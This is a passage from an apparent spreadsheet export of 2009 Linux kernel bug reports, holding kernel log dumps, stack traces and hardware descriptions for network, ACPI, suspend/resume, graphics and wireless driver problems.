May 6 18:13:25 mybecane kernel: 1e0: 00000016 00000008 0194786d 00008103 00000025 000045e1 0194786d 0000c5e3 May 6 18:13:25 mybecane kernel: 200: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 May 6 18:13:25 mybecane kernel: 220: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 May 6 18:13:25 mybecane kernel: 240: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 May 6 18:13:25 mybecane kernel: 260: 00000000 00000000 fe020001 00000100 00000000 00000000 fe020001 00000100 May 6 18:13:25 mybecane kernel: eth0: Dumping tx ring May 6 18:13:25 mybecane kernel: 000: 216e08fa a0000035 // 216e0cfa a0000035 // 216e1402 ac0000a8 // 216d3e02 ac00005c May 6 18:13:25 mybecane kernel: 004: 2153e002 ac00004c // 2153e202 ac00005c // 216e193e 8c000041 // 21520631 a000059f May 6 18:13:25 mybecane kernel: 008: 216e1d3e 8c000041 // 2148fe73 8000018c // 215fc000 a00002b1 // 2153e402 ac00005c May 6 18:13:25 mybecane kernel: 00c: 2153e602 ac00005c // 2153e802 ac00005c // 2153ea02 ac00004c // 2153ec02 ac00005c May 6 18:13:25 mybecane kernel: 010: 2153ee02 ac00005c // 2167054a 8c000035 // 2168a0c1 a00005b3 // 215ae602 ac000051 May 6 18:13:25 mybecane kernel: 014: 215ae202 ac00005c // 215ae002 ac00005c // 215ae402 ac00005c // 2167113e 8c000041 May 6 18:13:25 mybecane kernel: 018: 21589e3a 800001c5 // 21707000 a00003e1 // 2167153e 8c000041 // 2151aa33 a0000487 May 6 18:13:25 mybecane kernel: 01c: 21671d3e 8c000041 // 2166f604 a0000513 // 216a813e 8c000041 // 340cf5eb a000059f May 6 18:13:25 mybecane kernel: 020: 216a854a 8c000035 // 2163521f a000002d // 215ae802 ac000055 // 215aea02 ac00005c May 6 18:13:25 mybecane kernel: 024: 215aec02 ac00005c // 2154f002 ac00005c // 216a88ee a0000041 // 216a8d3e 8c000041 May 6 18:13:25 mybecane kernel: 028: 21746744 a00005a7 // 216a98fa a0000035 // 2154f802 ac00004c // 2154f202 ac00005c May 6 18:13:25 mybecane kernel: 02c: 2154fa02 ac00004c // 2154f402 ac00005c // 340d08e6 a0000049 // 216a9cfa a0000035 May 6 18:13:25 mybecane kernel: 030: 070c00fa a0000035 // 070c04ee a0000041 // 2154f602 ac000051 // 2154fc02 ac000051 May 6 18:13:25 mybecane kernel: 034: 2154fe02 ac000051 // 070c093e 8c000041 // 2157539d a0000513 // 070c0cee a0000041 May 6 18:13:25 mybecane kernel: 038: 070c10fa a0000035 // 215aee02 ac00005c // 21783002 ac00005c // 070c1802 ac00007a May 6 18:13:25 mybecane kernel: 03c: 070c1c02 ac00007a // 21783202 ac00005c // 21783402 ac00005c // 070c213e 8c000041 May 6 18:13:25 mybecane kernel: 040: 21520631 a000059f // 070c24fa a0000035 // 070c293e 8c000041 // 216b11cc a00004f5 May 6 18:13:25 mybecane kernel: 044: 070c2d3e 8c000041 // 216c5b3a 800004c5 // 2177d000 a000004d // 070c313e 8c000041 May 6 18:13:25 mybecane kernel: 048: 21588d7a 80000285 // 21510000 a0000319 // 070c353e 8c000041 // 2151031a a0000315 May 6 18:13:25 mybecane kernel: 04c: 070c393e 8c000041 // 21510630 a000059f // 070c813e 8c000041 // 2148fe73 8000018c May 6 18:13:25 mybecane kernel: 050: 215fc000 a00002b1 // 21783602 ac000055 // 21783802 ac00005c // 21783a02 ac00005c May 6 18:13:25 mybecane kernel: 054: 21783c02 ac00005c // 21783e02 ac00004c // 070c853e 8c000041 // 21588d7a 80000285 May 6 18:13:25 mybecane kernel: 058: 21510000 a0000319 // 070c894a 8c000035 // 2168a0c1 a00005b3 // 21730202 ac00005c May 6 18:13:25 mybecane kernel: 05c: 21589e3a 00000000 // 21707000 a00003e1 // 364294ee a0000041 // 36230cee a0000041 May 6 18:13:25 mybecane kernel: 060: 341d18ee a0000041 // 2167a0ee a0000041 // 2167b0fa a0000035 // 2167b8fa a0000035 May 6 18:13:25 mybecane kernel: 064: 3434e4fa a0000035 // 215774fa a0000035 // 3634c0fa a0000035 // 2148c8ee a0000041 May 6 18:13:25 mybecane kernel: 068: 2148c0ee a0000041 // 34125d3e 8c000041 // 215df0c5 a000002e // 342da13e 8c000041 May 6 18:13:25 mybecane kernel: 06c: 21495098 a000002e // 342da53e 8c000041 // 214ea162 a000002e // 342dad3e 8c000041 May 6 18:13:25 mybecane kernel: 070: 216ae080 a000002e // 342db13e 8c000041 // 2175eb13 a000002d // 3613ed3e 91478041 May 6 18:13:25 mybecane kernel: 074: 216b1be0 8000041f // 215c4000 a000061b // 21576d3e 8c000041 // 215efc80 8000037f May 6 18:13:25 mybecane kernel: 078: 21625000 a0000193 // 342db8fa a0000035 // 342dbd3e 8c000041 // 21520631 a000059f May 6 18:13:25 mybecane kernel: 07c: 2157013e 8c000041 // 21520bd1 a0000283 // 2157093e 8c000041 // 2148fe73 8000018c May 6 18:13:25 mybecane kernel: 080: 215fc000 a00002b1 // 21570d3e 8c000041 // 215fc2b2 a000059f // 215714ee a0000041 May 6 18:13:25 mybecane kernel: 084: 2157194a 8c000035 // 2168a0c1 a00005b3 // 21571d4a 8c000035 // 2168a675 a0000473 May 6 18:13:25 mybecane kernel: 088: 2157653e 8c000041 // 21746744 a00005a7 // 2160013e 8c000041 // 214ea162 a000002e May 6 18:13:25 mybecane kernel: 08c: 2160053e 8c000041 // 21495098 a000002e // 3613f4fa a0000035 // 21600d3e 8c000041 May 6 18:13:25 mybecane kernel: 090: 21520631 a000059f // 3613f93e 91680041 // 2158d45b a0000b3f // 2160153e 8c000041 May 6 18:13:25 mybecane kernel: 094: 2166f604 a0000513 // 2160193e 8c000041 // 2148fe73 8000018c // 215fc000 a00002b1 May 6 18:13:25 mybecane kernel: 098: 342db53e 91478041 // 215c461c 800009e3 // 215be000 a0000057 // 2168c14a 8c000035 May 6 18:13:25 mybecane kernel: 09c: 2168a0c1 a00005b3 // 2157713e 8c000041 // 2151aa33 a0000487 // 2168c402 ac0000b8 May 6 18:13:25 mybecane kernel: 0a0: 36142e02 ac00004c // 2168c802 ac00007a // 36142602 ac00004c // 36142c02 ac00005c May 6 18:13:25 mybecane kernel: 0a4: 2168ccee a0000041 // 3613e93e 8c000041 // 340cf5eb a000059f // 2168d53e 8c000041 May 6 18:13:25 mybecane kernel: 0a8: 2166f604 a0000513 // 2168d93e 8c000041 // 21520631 a000059f // 21601d3e 91478041 May 6 18:13:25 mybecane kernel: 0ac: 215be058 a0000a3b // 214f40fa a0000035 // 214f453e 8c000041 // 2148fe73 8000018c May 6 18:13:25 mybecane kernel: 0b0: 215fc000 a00002b1 // 214f493e 8c000041 // 215efc80 8000037f // 21625000 a0000193 May 6 18:13:25 mybecane kernel: 0b4: 214f4d4a 8c000035 // 2168a0c1 a00005b3 // 214f513e 8c000041 // 21746744 a00005a7 May 6 18:13:25 mybecane kernel: 0b8: 341d1d3e 8c000041 // 2157539d a0000513 // 2168dd3e 91478041 // 215bea94 8000056b May 6 18:13:25 mybecane kernel: 0bc: 21550000 a00004cf // 3629fe02 ac00004c // 21536402 ac00007a // 341be802 ac00004c May 6 18:13:25 mybecane kernel: 0c0: 21536802 ac00007a // 214c7002 ac00004c // 21536cfa a0000035 // 2153714a 8c000035 May 6 18:13:25 mybecane kernel: 0c4: 215f8404 a000002d // 2153753e 8c000041 // 21589e3a 800001c5 // 21707000 a00003e1 May 6 18:13:25 mybecane kernel: 0c8: 215378fa a0000035 // 21537d3e 8c000041 // 21520631 a000059f // 214f5cee a0000041 May 6 18:13:25 mybecane kernel: 0cc: 214f553e 8c000041 // 2148fe73 8000018c // 215fc000 a00002b1 // 2166a0ee a0000041 May 6 18:13:25 mybecane kernel: 0d0: 2166a94a 8c000035 // 2168a0c1 a00005b3 // 2166a53e 8c000041 // 2151aa33 a0000487 May 6 18:13:25 mybecane kernel: 0d4: 214c7802 ac00005c // 2166ac02 ac00007a // 36244c02 ac00004c // 342dd402 ac00005c May 6 18:13:25 mybecane kernel: 0d8: 2153613e 91478041 // 215504d0 a0000a3b // 2166b53e 8c000041 // 340cf5eb a000059f May 6 18:13:25 mybecane kernel: 0dc: 3613e53e 8c000041 // 216b11cc a00004f5 // 36322602 ac000051 // 2166b93e 8c000041 May 6 18:13:25 mybecane kernel: 0e0: 216c5b3a 800004c5 // 2177d000 a000004d // 2166bcfa a0000035 // 215fe13e 8c000041 May 6 18:13:25 mybecane kernel: 0e4: 21746744 a00005a7 // 215fe53e 8c000041 // 216c5b3a 800004c5 // 2177d000 a000004d May 6 18:13:25 mybecane kernel: 0e8: 215fe802 ac0000b8 // 340e7402 ac00005c // 340f1002 ac00005c // 3629f202 ac00005c May 6 18:13:25 mybecane kernel: 0ec: 215fecee a0000041 // 215ff0fa a0000035 // 215ff4ee a0000041 // 215ff8fa a0000035 May 6 18:13:25 mybecane kernel: 0f0: 34192202 ac000051 // 3411d602 ac000051 // 3616c402 ac000051 // 214c7202 ac000051 May 6 18:13:25 mybecane kernel: 0f4: 342dd602 ac000051 // 36322c02 ac000051 // 36142a02 ac000051 // 216d3002 ac000051 May 6 18:13:25 mybecane kernel: 0f8: 216d3202 ac000051 // 216d3402 ac000051 // 216d3602 ac000051 // 216d3802 ac000051 May 6 18:13:25 mybecane kernel: 0fc: 216d3a02 ac000051 // 216d3c02 ac000051 // 216e00ee a0000041 // 216e04ee a0000041 May 6 18:14:25 mybecane kernel: eth0: Got tx_timeout. irq: 00000000 Thx Mikex</t>
  </si>
  <si>
    <t>BIOS _TPC always forces CPU to T3 - Clevo M720R w/ Intel T8100 CPU</t>
  </si>
  <si>
    <t>2009-05-06 19:58 UTC</t>
  </si>
  <si>
    <t>2009-05-31 20:37 UTC</t>
  </si>
  <si>
    <t>Created attachment 21249 [details] Clevo M720R acpidump My Clevo M720R notebook has an Intel Core 2 Duo T8100 processor. Upon boot, Core 1 shows throttling states T0--T7 available and operates in T0, with full performance. Core 0 on the other hand has only T3--T7 and is stuck in T3, its performance suffering noticeably. There is no thermal reason for this, the CPU is well within its safe temperature zone. If I booting with acpi=off, this problem does not manifest. After a suspend/resume cycle, both cores end up in T8 (outside the reported available range), but both have full performance. Another difference after suspend/resume is that CPU0 goes from SMI thermal monitoring to TM2 (Core 1 is TM2 throughout). This is with kernel-2.6.29.2-129.fc11.x86_64, but I believe I have seen this as far back as roughly 2.6.24, IIRC (the first kernel I used with this notebook). Attached are the acpidump output, /proc/acpi info before and after suspend/resume, and a dmesg log for a session with a suspend/resume cycle.</t>
  </si>
  <si>
    <t>Error by disconnecting USB flash storage in 2.6.30-rc5 x86-64</t>
  </si>
  <si>
    <t>2009-05-10 10:44 UTC</t>
  </si>
  <si>
    <t>2012-06-07 10:27 UTC</t>
  </si>
  <si>
    <t>Created attachment 21291 [details] dmesg dump</t>
  </si>
  <si>
    <t>setting primary bootdevice (bios) to external vga, kernel mode setting for internal lvds fails</t>
  </si>
  <si>
    <t>2.6.29, 2.6.30</t>
  </si>
  <si>
    <t>2009-05-10 22:45 UTC</t>
  </si>
  <si>
    <t>2010-09-03 06:23 UTC</t>
  </si>
  <si>
    <t>Created attachment 21296 [details] my kernel config My Thinkpad R61 has an bios option to set the primary display to 'vga'. old behaviour (non-kms): using this, the internal display (lvds) stays black, if vga(external) is connected and i see everything on the attached vga. (bios, grub, kernel) sometimes later X starts and activates the lvds and i have one big desktop. all's well. but nowadays with kernel-mode-setting: booting with kms enabled (config and dmesg attached) i get thing's displayed on my vga until the kernel sets the video modes. on my vga display all is well, but the lvds starts ''growing white''. starting X dosn't fix things, but the lvds is ''resetted'' and restarts to grow white. sometimes i see some residue of the (vga)framebuffer content at first until all is white. i have one warning in my dmesg (see attached), but only after i start X. the display-distortion is independent of X. note: setting the primary boot-device in the bios to 'internal display' everything works just fine, everything is displayed on the lvds, until the kernel starts setting the modes. from then on, i have nice cloned framebuffer console. X works also as it should. i have also attached the Xorg.0.log, maybe you can see something in there.</t>
  </si>
  <si>
    <t>2.6.30 regression - hang on 2nd resume - bisected - Thinkpad X40</t>
  </si>
  <si>
    <t>2009-05-11 10:08 UTC</t>
  </si>
  <si>
    <t>2009-07-07 10:44 UTC</t>
  </si>
  <si>
    <t>Created attachment 21303 [details] dmesg of 2.6.30-rc2 with ff69.. reverted Hardware: IBM Thinkpad X40, 1.2Ghz Pentium M 1.5GB ram Software: Debian unstable 32bit ff69f2bba67bd45514923aaedbf40fe351787c59 caused a regression when booting-up on my setup. See http://bugzilla.kernel.org/show_bug.cgi?id=13087 for reference. This issue has been fixed with f461ddea0af8b98e2b7940eba9c693b0ee44d64a. Unfortunately ff69.. also caused a resume hang on my setup, which is _not_ yet fixed. Problem: 2.6.30-rc2 hangs after in the second suspend/resume cycle when resuming. The fan and harddisk spin up and the lcd light switches on (and shows the blinking cursor) but then the machine hangs. Only holding down the power button for 4 secs helps. The suspend indicator light does not switch to the blinking mode like it does when resuming normally (before it switches off completely). Reverting ff69.. on top of 2.6.30-rc2 fixes the issue. Latest kernel I tried is v2.6.30-rc5-96-ga4d7749. But then reverting f461.. and ff69.. didn't fully fixed the problem: I could only resume two times (instead of only once) before the machine hung when resuming. Kernels before ff69 work flawless (at least the ones I've tested, and I'm updating -linus from git fairly often). I'll add the dmesg one suspend-resume cylce of 2.6.30-rc2 with ff69 reverted.</t>
  </si>
  <si>
    <t>[PATCH]Leadtek WinFast DTV Dongle H is not detected</t>
  </si>
  <si>
    <t>ALL</t>
  </si>
  <si>
    <t>2009-05-11 20:22 UTC</t>
  </si>
  <si>
    <t>2010-01-25 16:23 UTC</t>
  </si>
  <si>
    <t>Created attachment 21306 [details] Patch to fix detection of this particular card Leadtek WinFast DTV Dongle H is not detected Patch is available and developed by me - I will post it here later</t>
  </si>
  <si>
    <t>ath5k: leds not working for Trust PCMCIA card (Atheros 5212)</t>
  </si>
  <si>
    <t>2.6.30-rc5</t>
  </si>
  <si>
    <t>2009-05-12 23:30 UTC</t>
  </si>
  <si>
    <t>2009-10-25 20:16 UTC</t>
  </si>
  <si>
    <t>Same problem occurs with earlier kernel versions. The card has two leds: "power" and "link". They work perfectly if I compile the madwifi driver with 2.6.30-rc5. When the card is trying to associate, the leds blink alternating. When there is a link, they blink together and the blink rate varies with the amount of data being transmitted. I added some debugging in the madwifi driver which shows register 0x4010 getting set to 0x10, 0x30 and 0x50 (see attachment madwifi_led_debug2). It seems like in ath5k setting the leds is just not implemented for my card. There is a function ath5k_hw_set_ledstate() in gpio.c that looks like it would do the right thing, but that does not seem to be called from anywhere. I added similar debugging as with the madwifi driver in ath5k_hw_set_ledstate(), but that gave nothing.</t>
  </si>
  <si>
    <t>irq 9: nobody cared when resuming from suspend to ram</t>
  </si>
  <si>
    <t>2009-05-13 04:01 UTC</t>
  </si>
  <si>
    <t>2009-05-16 21:43 UTC</t>
  </si>
  <si>
    <t>(Note I have bisected this, will follow-up in thread shortly) From http://lkml.org/lkml/2009/5/7/157: I have been seeing the following in 2.6.30 whenever I suspend to ram. The power button no longer works afterwards. I don't recall any problems with 2.6.29. Anyone have any ideas before I try bisecting? (The previous W taint is something unrelated.) [31263.940249] appletouch: Geyser mode initialized. [31263.941375] usb 4-2: type resume [31264.043112] usb 4-2: reset full speed USB device using uhci_hcd and address 2 [31264.183582] usb 5-1: type resume [31264.283313] irq 9: nobody cared (try booting with the "irqpoll" option) [31264.283318] Pid: 0, comm: swapper Tainted: G W 2.6.30-rc4-wl #116 [31264.283320] Call Trace: [31264.283328] [&lt;c015a01a&gt;] __report_bad_irq+0x33/0x74 [31264.283333] [&lt;c015a150&gt;] note_interrupt+0xf5/0x14d [31264.283337] [&lt;c015a6bf&gt;] handle_fasteoi_irq+0x8c/0xb0 [31264.283342] [&lt;c0104601&gt;] handle_irq+0x40/0x4b [31264.283348] [&lt;c035a322&gt;] do_IRQ+0x4a/0x8c [31264.283352] [&lt;c010312e&gt;] common_interrupt+0x2e/0x34 [31264.283358] [&lt;c01455a3&gt;] ? trace_hardirqs_on+0xb/0xd [31264.283362] [&lt;c014007b&gt;] ? timer_list_show+0x1b3/0x939 [31264.283375] [&lt;f891c00f&gt;] ? acpi_idle_enter_c1+0xad/0xb9 [processor] [31264.283380] [&lt;c02d20ee&gt;] cpuidle_idle_call+0x6a/0x9c [31264.283384] [&lt;c0101cc8&gt;] cpu_idle+0x53/0x87 [31264.283388] [&lt;c03467e0&gt;] rest_init+0x6c/0x6e [31264.283394] [&lt;c04df74d&gt;] start_kernel+0x286/0x28b [31264.283398] [&lt;c04df037&gt;] __init_begin+0x37/0x3c [31264.283400] handlers: [31264.283402] [&lt;c022cabc&gt;] (acpi_irq+0x0/0x2e) [31264.283408] Disabling IRQ #9 [31264.285035] usb 5-1: reset full speed USB device using uhci_hcd and address 2 [31264.383127] ------------[ cut here ]------------ [31264.383132] WARNING: at kernel/irq/handle.c:366 handle_IRQ_event+0x40/0x179() [31264.383137] Hardware name: MacBook1,1 [31264.383140] BUG: IRQ handler called from non-hardirq context!Modules linked in: fuse i915 drm af_packet acpi_cpufreq binfmt_misc dm_mirror dm_region_hash dm_log dm_multipath dm_mod arc4 ecb ath5k snd_hda_codec_idt snd_hda_intel hid_apple appletouch snd_hda_codec mac80211 usbhid snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq ath snd_seq_device sky2 ohci1394 snd_pcm_oss snd_mixer_oss cfg80211 ieee1394 processor button snd_pcm snd_timer uhci_hcd ehci_hcd bitrev snd ac battery thermal snd_page_alloc crc32 sg joydev sr_mod applesmc input_polldev evdev cdrom unix [last unloaded: microcode] [31264.383241] Pid: 0, comm: swapper Tainted: G W 2.6.30-rc4-wl #116 [31264.383245] Call Trace: [31264.383254] [&lt;c012590f&gt;] warn_slowpath+0x76/0xa5 [31264.383264] [&lt;c01473e5&gt;] ? print_lock_contention_bug+0x14/0xd7 [31264.383272] [&lt;c013bb30&gt;] ? sched_clock_cpu+0x92/0x2f1 [31264.383281] [&lt;c01455a3&gt;] ? trace_hardirqs_on+0xb/0xd [31264.383290] [&lt;c035659a&gt;] ? _spin_unlock_irqrestore+0x3b/0x5d [31264.383298] [&lt;c0145473&gt;] ? trace_hardirqs_on_caller+0x18/0x13d [31264.383307] [&lt;c03565a6&gt;] ? _spin_unlock_irqrestore+0x47/0x5d [31264.383315] [&lt;c0159f0d&gt;] ? try_one_irq+0x92/0xf7 [31264.383323] [&lt;c0158f31&gt;] handle_IRQ_event+0x40/0x179 [31264.383331] [&lt;c0159f25&gt;] try_one_irq+0xaa/0xf7 [31264.383340] [&lt;c0159fa1&gt;] poll_all_shared_irqs+0x2f/0x44 [31264.383348] [&lt;c0159fc3&gt;] poll_spurious_irqs+0xd/0x22 [31264.383356] [&lt;c012d860&gt;] run_timer_softirq+0x196/0x20f [31264.383363] [&lt;c012d7e1&gt;] ? run_timer_softirq+0x117/0x20f [31264.383372] [&lt;c0159fb6&gt;] ? poll_spurious_irqs+0x0/0x22 [31264.383381] [&lt;c0129f91&gt;] __do_softirq+0xb1/0x182 [31264.383390] [&lt;c012a092&gt;] do_softirq+0x30/0x48 [31264.383397] [&lt;c012a20a&gt;] irq_exit+0x3d/0x74 [31264.383405] [&lt;c035a34e&gt;] do_IRQ+0x76/0x8c [31264.383413] [&lt;c010312e&gt;] common_interrupt+0x2e/0x34 [31264.383422] [&lt;c014007b&gt;] ? timer_list_show+0x1b3/0x939 [31264.383440] [&lt;f891c281&gt;] ? acpi_idle_enter_bm+0x266/0x291 [processor] [31264.383450] [&lt;c02d20ee&gt;] cpuidle_idle_call+0x6a/0x9c [31264.383458] [&lt;c0101cc8&gt;] cpu_idle+0x53/0x87 [31264.383465] [&lt;c03467e0&gt;] rest_init+0x6c/0x6e [31264.383482] [&lt;c04df74d&gt;] start_kernel+0x286/0x28b [31264.383487] [&lt;c04df037&gt;] __init_begin+0x37/0x3c [31264.383489] ---[ end trace 576a96bb93c6d61f ]--- [31264.460510] ieee80211 phy0: legacy class resume [31264.460589] drm card0: legacy class resume [31264.460634] pci 0000:00:02.0: restoring config space at offset 0x1 (was 0x900007, writing 0x900003) [31264.460661] pci 0000:00:02.0: setting latency timer to 64 bob@sludge wireless-testing]$ cat /proc/interrupts CPU0 CPU1 0: 1967552 0 IO-APIC-edge timer 8: 84 0 IO-APIC-edge rtc0 9: 138333 261669 IO-APIC-fasteoi acpi 14: 329504 0 IO-APIC-edge ata_piix 15: 0 0 IO-APIC-edge ata_piix 16: 1918 84773 IO-APIC-fasteoi uhci_hcd:usb5, eth0, i915@pci:0000:00:02.0 17: 127320 0 IO-APIC-fasteoi ath 18: 69 0 IO-APIC-fasteoi uhci_hcd:usb4 19: 4230 117896 IO-APIC-fasteoi ata_piix, uhci_hcd:usb3, ohci1394 21: 744 79985 IO-APIC-fasteoi ehci_hcd:usb1, uhci_hcd:usb2 22: 268 0 IO-APIC-fasteoi HDA Intel NMI: 0 0 Non-maskable interrupts LOC: 357130 1384924 Local timer interrupts SPU: 0 0 Spurious interrupts RES: 243366 162707 Rescheduling interrupts CAL: 193 367 Function call interrupts TLB: 2533 2519 TLB shootdowns TRM: 0 0 Thermal event interrupts ERR: 0 MIS: 0</t>
  </si>
  <si>
    <t>wlan0 hang-up after iwconfig</t>
  </si>
  <si>
    <t>2.6.30-rc5-00112-g1d80cac</t>
  </si>
  <si>
    <t>2009-05-13 04:21 UTC</t>
  </si>
  <si>
    <t>2009-05-15 15:20 UTC</t>
  </si>
  <si>
    <t>After I type: # ifconfig wlan0 up # iwconfig wlan0 channel X essid YYYYYY key ZZZZZZZZZZ ap any I got this message: [ 43.730392] ADDRCONF(NETDEV_UP): wlan0: link is not ready [ 54.312480] wlan0: authenticate with AP 00:13:10:a4:74:d5 [ 54.313819] wlan0: authenticated [ 54.313825] wlan0: associate with AP 00:13:10:a4:74:d5 [ 54.315836] wlan0: RX AssocResp from 00:13:10:a4:74:d5 (capab=0x451 status=0 aid=4) [ 54.315842] wlan0: associated [ 54.315857] BUG: unable to handle kernel NULL pointer dereference at 00000010 [ 54.316825] IP: [&lt;f859e672&gt;] minstrel_alloc_sta+0xb6/0x107 [mac80211] [ 54.316825] *pde = 00000000 [ 54.316825] Oops: 0000 [#1] PREEMPT SMP [ 54.316825] last sysfs file: /sys/class/power_supply/BAT0/charge_full [ 54.316825] Modules linked in: coretemp hwmon snd_hda_codec_si3054 arc4 ecb cryptomgr aead pcompress snd_hda_codec_realtek crypto_blkcipher crypto_hash crypto_algapi snd_hda_intel snd_hda_codec intelfb sdhci_pci sdhci ath5k intel_agp tifm_7xx1 agpgart tifm_core mac80211 led_class i2c_i801 thermal processor cfg80211 snd_pcm snd_timer snd_page_alloc rtc_cmos rtc_core rtc_lib i2c_algo_bit [ 54.316825] [ 54.316825] Pid: 2554, comm: phy0 Not tainted (2.6.30-rc5-maluta-00112-g1d80cac #1) Crestline &amp; ICH8M Chipset [ 54.316825] EIP: 0060:[&lt;f859e672&gt;] EFLAGS: 00010206 CPU: 0 [ 54.316825] EIP is at minstrel_alloc_sta+0xb6/0x107 [mac80211] [ 54.316825] EAX: 00000000 EBX: f85a8890 ECX: f6968080 EDX: 0000000c [ 54.316825] ESI: f6ab0580 EDI: 00008020 EBP: f6be9d30 ESP: f6be9d18 [ 54.316825] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [ 54.316825] Process phy0 (pid: 2554, ti=f6be8000 task=f70e6730 task.ti=f6be8000) [ 54.316825] Stack: [ 54.316825] 00000020 f6968180 00000040 f85a8890 f67afc00 f726cd78 f6be9d4c f8586c57 [ 54.316825] 00000020 f726cbc0 f859fb3a f6ac906e 00000000 f6be9e90 f858c936 00005265 [ 54.417352] 00000002 0000002e f6ac9040 f726cbc0 f726cd78 00000000 f6be9d80 f6bb3a80 [ 54.417352] Call Trace: [ 54.417352] [&lt;f8586c57&gt;] ? sta_info_alloc+0x7f/0x129 [mac80211] [ 54.417352] [&lt;f858c936&gt;] ? ieee80211_rx_mgmt_assoc_resp+0x2d1/0xafe [mac80211] [ 54.417352] [&lt;c012d5a6&gt;] ? local_bh_enable_ip+0x78/0x8c [ 54.417352] [&lt;c044d986&gt;] ? _spin_unlock_irqrestore+0x33/0x49 [ 54.417352] [&lt;c03a6bfa&gt;] ? __kfree_skb+0x73/0x76 [ 54.417352] [&lt;f858deed&gt;] ? ieee80211_sta_rx_queued_mgmt+0x641/0x7c0 [mac80211] [ 54.417352] [&lt;c012043a&gt;] ? update_curr+0x6f/0x144 [ 54.417352] [&lt;c0102108&gt;] ? __switch_to+0x101/0x19c [ 54.417352] [&lt;c044d93f&gt;] ? _spin_unlock_irq+0x2b/0x3f [ 54.417352] [&lt;c01243b3&gt;] ? finish_task_switch+0x4a/0xa1 [ 54.417352] [&lt;c044bcbc&gt;] ? __schedule+0x705/0x758 [ 54.417352] [&lt;c01190b6&gt;] ? default_spin_lock_flags+0x15/0x1b [ 54.417352] [&lt;c044d781&gt;] ? _spin_lock_irqsave+0x3d/0x46 [ 54.417352] [&lt;c044d986&gt;] ? _spin_unlock_irqrestore+0x33/0x49 [ 54.417352] [&lt;c03a64a6&gt;] ? skb_dequeue+0x4a/0x51 [ 54.417352] [&lt;f858e0de&gt;] ? ieee80211_sta_work+0x72/0x548 [mac80211] [ 54.417352] [&lt;c044d781&gt;] ? _spin_lock_irqsave+0x3d/0x46 [ 54.417352] [&lt;c044d986&gt;] ? _spin_unlock_irqrestore+0x33/0x49 [ 54.417352] [&lt;c01369b6&gt;] ? worker_thread+0x15d/0x1ee [ 54.417352] [&lt;f858e06c&gt;] ? ieee80211_sta_work+0x0/0x548 [mac80211] [ 54.417352] [&lt;c0139fc3&gt;] ? autoremove_wake_function+0x0/0x38 [ 54.417352] [&lt;c0136859&gt;] ? worker_thread+0x0/0x1ee [ 54.417352] [&lt;c0139c69&gt;] ? kthread+0x4a/0x70 [ 54.417352] [&lt;c0139c1f&gt;] ? kthread+0x0/0x70 [ 54.417352] [&lt;c0103ea7&gt;] ? kernel_thread_helper+0x7/0x10 [ 54.417352] Code: 0e 89 fa b8 40 00 00 00 e8 bb 99 be c7 89 c6 31 c0 85 f6 74 5f 8b 45 ec 31 d2 8b 48 20 8b 41 1c 83 78 10 00 0f 49 50 10 8b 41 20 &lt;8b&gt; 40 10 39 c2 89 c3 0f 4d da 89 fa 6b c3 54 e8 89 99 be c7 85 [ 54.417352] EIP: [&lt;f859e672&gt;] minstrel_alloc_sta+0xb6/0x107 [mac80211] SS:ESP 0068:f6be9d18 [ 54.417352] CR2: 0000000000000010 [ 54.420272] ---[ end trace ac9aec8020927b03 ]--- [ 54.420275] note: phy0[2554] exited with preempt_count 1 --------------------- My hardware --------------------- 02:00.0 Ethernet controller: Atheros Communications, Inc. AR5006EG 802.11 b/g Wireless PCI Express Adapter (rev 01) Subsystem: Device 1a32:0105 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 16 Region 0: Memory at f0800000 (64-bit, non-prefetchable) [size=64K] Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [50] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- Address: 00000000 Data: 0000 Capabilities: [60] Express (v1) Legacy Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;512ns, L1 &lt;64us ExtTag- AttnBtn- AttnInd- PwrInd- RBE- FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 512 bytes DevSta: CorrErr+ UncorrErr+ FatalErr- UnsuppReq+ AuxPwr- TransPend- LnkCap: Port #0, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;512ns, L1 &lt;64us ClockPM- Suprise- LLActRep- BwNot- LnkCtl: ASPM L0s L1 Enabled; RCB 128 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- Capabilities: [90] MSI-X: Enable- Mask- TabSize=1 Vector table: BAR=0 offset=00000000 PBA: BAR=0 offset=00000000 Capabilities: [100] Advanced Error Reporting &lt;?&gt; Capabilities: [140] Virtual Channel &lt;?&gt; Kernel driver in use: ath5k Kernel modules: ath5k ------------------- I can use this driver in 2.6.29.</t>
  </si>
  <si>
    <t>Kernel BUG under network load with gianfar</t>
  </si>
  <si>
    <t>2009-05-13 09:43 UTC</t>
  </si>
  <si>
    <t>2009-05-30 21:33 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] 2.6.30-rc4: Kernel BUG under network load with gianfar Submitter : Michael Guntsche &lt;mike@it-loops.com&gt; Date : 2009-05-03 13:36 References : http://marc.info/?l=linux-kernel&amp;m=124135824600924&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>i915: drm: xorg leaks drm objects massively</t>
  </si>
  <si>
    <t>2009-05-13 09:48 UTC</t>
  </si>
  <si>
    <t>2010-06-18 14:29 UTC</t>
  </si>
  <si>
